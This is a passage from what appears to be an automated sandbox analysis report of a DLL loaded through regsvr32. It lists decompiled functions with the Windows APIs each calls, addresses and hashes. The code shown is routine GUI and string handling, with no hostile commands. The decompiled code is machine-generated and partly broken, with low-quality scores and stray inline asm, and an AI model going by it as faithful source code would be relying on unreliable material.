				_v8 = _t14;
				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
				_t24 = 0;
				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t30 =  *((intOrPtr*)(E100373B5() + 4));
				if(_v272 > 0) {
					do {
						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
						_t24 = _t24 + 1;
					} while (_t24 < _v272);
				}
				DragFinish(_a4);
				return E100117AE(_t18, _v8);
			}











                                                                        0x10031d8e
                                                                        0x10031d99
                                                                        0x10031da3
                                                                        0x10031dae
                                                                        0x10031db9
                                                                        0x10031dca
                                                                        0x10031dcd
                                                                        0x10031dcf
                                                                        0x10031ddf
                                                                        0x10031dec
                                                                        0x10031df2
                                                                        0x10031df3
                                                                        0x10031dcf
                                                                        0x10031dfe
                                                                        0x10031e10

                                                                        APIs
                                                                        • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                        • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                        • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                        • DragFinish.SHELL32(?), ref: 10031DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                        • String ID:
                                                                        • API String ID: 892977027-0
                                                                        • Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                        • Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
                                                                        • Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                        • Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100368F3 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0xa8) = _a4;
					 *(_t37 + 0xac) = _a8;
					 *(_t37 + 0xa0) = _a12;
					_t21 = _a16;
					 *(_t37 + 0xa4) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}





                                                                        0x100368f7
                                                                        0x10036904
                                                                        0x10036954
                                                                        0x1003695d
                                                                        0x10036966
                                                                        0x1003696c
                                                                        0x1003696f
                                                                        0x00000000
                                                                        0x1003696f
                                                                        0x10036925
                                                                        0x1003693f
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3225880595-0
                                                                        • Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                        • Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
                                                                        • Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                        • Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036FD8 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E10036FD8(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}












                                                                        0x10036fda
                                                                        0x10036fe3
                                                                        0x10036fec
                                                                        0x10036ffc
                                                                        0x10037002
                                                                        0x10037006
                                                                        0x1003700a
                                                                        0x10037016
                                                                        0x1003701f
                                                                        0x00000000
                                                                        0x10037026
                                                                        0x00000000

                                                                        APIs
                                                                        • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                        • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Byte$CharMultiStringWide$Alloc
                                                                        • String ID:
                                                                        • API String ID: 3384502665-0
                                                                        • Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                        • Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
                                                                        • Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                        • Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036B96 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E1002F372(__ecx, _t19, _a8);
				_t12 = E100202AB(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}










                                                                        0x10036b9d
                                                                        0x10036ba4
                                                                        0x10036ba7
                                                                        0x10036bae
                                                                        0x10036bb6
                                                                        0x10036bc2
                                                                        0x10036bca
                                                                        0x10036bdc
                                                                        0x10036bea
                                                                        0x10036bf8
                                                                        0x10036bfc
                                                                        0x00000000
                                                                        0x10036bff
                                                                        0x10036bca
                                                                        0x10036c03

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetParent.USER32(?), ref: 10036BBB
                                                                        • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                        • GetSystemMetrics.USER32 ref: 10036BEA
                                                                        • GetSystemMetrics.USER32 ref: 10036BF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem$LongParentWindowZoomed
                                                                        • String ID:
                                                                        • API String ID: 3909876373-0
                                                                        • Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                        • Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
                                                                        • Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                        • Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000BFC5 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}





                                                                        0x1000bfd0
                                                                        0x1000bfd3
                                                                        0x1000bff6
                                                                        0x1000c003
                                                                        0x1000bfd5
                                                                        0x1000bfe0
                                                                        0x1000bfe1
                                                                        0x1000bfe2
                                                                        0x1000bfe3
                                                                        0x1000bfe5
                                                                        0x1000c015
                                                                        0x1000c02a
                                                                        0x1000c02a
                                                                        0x1000c034

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                        • String ID:
                                                                        • API String ID: 3354205298-0
                                                                        • Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                        • Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
                                                                        • Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                        • Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100214B2 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}







                                                                        0x100214bc
                                                                        0x10021521
                                                                        0x00000000
                                                                        0x100214c4
                                                                        0x100214c4
                                                                        0x100214ca
                                                                        0x00000000
                                                                        0x100214e7
                                                                        0x100214f0
                                                                        0x100214fc
                                                                        0x10021502
                                                                        0x10021508
                                                                        0x1002150c
                                                                        0x1002150c
                                                                        0x10021516
                                                                        0x00000000
                                                                        0x1002151e
                                                                        0x100214ca

                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                        • GetSysColor.USER32(00000008), ref: 1002150C
                                                                        • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Color$LongObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2871169696-0
                                                                        • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                        • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002095F Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E1002095F(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011BF0(0x1003a4d8, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}






                                                                        0x10020964
                                                                        0x10020969
                                                                        0x10020971
                                                                        0x10020993
                                                                        0x1002099b
                                                                        0x100209a2
                                                                        0x100209a3
                                                                        0x100209b2
                                                                        0x100209bb
                                                                        0x100209c9
                                                                        0x100209ce
                                                                        0x10020973
                                                                        0x1002097c
                                                                        0x1002097c
                                                                        0x100209d4
                                                                        0x100209dc

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10020964
                                                                        • GetWindowTextA.USER32 ref: 1002097C
                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                        • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3022380644-0
                                                                        • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                        • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001B66F Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B64E( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B64E( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}








                                                                        0x1001b670
                                                                        0x1001b675
                                                                        0x1001b67e
                                                                        0x1001b683
                                                                        0x1001b688
                                                                        0x1001b68a
                                                                        0x1001b692
                                                                        0x1001b697
                                                                        0x1001b69c
                                                                        0x1001b69e
                                                                        0x1001b69e
                                                                        0x1001b69c
                                                                        0x1001b6a1
                                                                        0x1001b6b4
                                                                        0x1001b6b6
                                                                        0x1001b6b6
                                                                        0x1001b6b9
                                                                        0x1001b6cc

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ___addl
                                                                        • String ID:
                                                                        • API String ID: 2260456530-0
                                                                        • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                        • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029B23 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x1004c470; // 0x303bb91f
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E100117AE(_t13, _v8);
			}







                                                                        0x10029b2c
                                                                        0x10029b35
                                                                        0x10029b3e
                                                                        0x10029b47
                                                                        0x10029b78
                                                                        0x10029b78
                                                                        0x10029b88

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow$lstrcmplstrlen
                                                                        • String ID:
                                                                        • API String ID: 330964273-0
                                                                        • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                        • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100308EB Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100308EB(void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t11;
				void* _t12;
				signed int* _t13;
				void* _t14;

				_t12 = __ecx;
				E10030582(__ecx, __eflags, 1);
				ReleaseCapture();
				_t11 = E100220EE(_t14, GetDesktopWindow());
				LockWindowUpdate(0);
				_t13 = _t12 + 0x84;
				_t8 =  *_t13;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
					 *_t13 =  *_t13 & 0x00000000;
					return _t9;
				}
				return _t8;
			}









                                                                        0x100308ef
                                                                        0x100308f1
                                                                        0x100308f6
                                                                        0x1003090a
                                                                        0x1003090c
                                                                        0x10030912
                                                                        0x10030918
                                                                        0x1003091c
                                                                        0x10030924
                                                                        0x1003092a
                                                                        0x00000000
                                                                        0x1003092a
                                                                        0x1003092f

                                                                        APIs
                                                                          • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                        • GetDesktopWindow.USER32 ref: 100308FC
                                                                        • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                        • ReleaseDC.USER32 ref: 10030924
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                        • String ID:
                                                                        • API String ID: 1260764132-0
                                                                        • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                        • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100128A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E100128A7(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
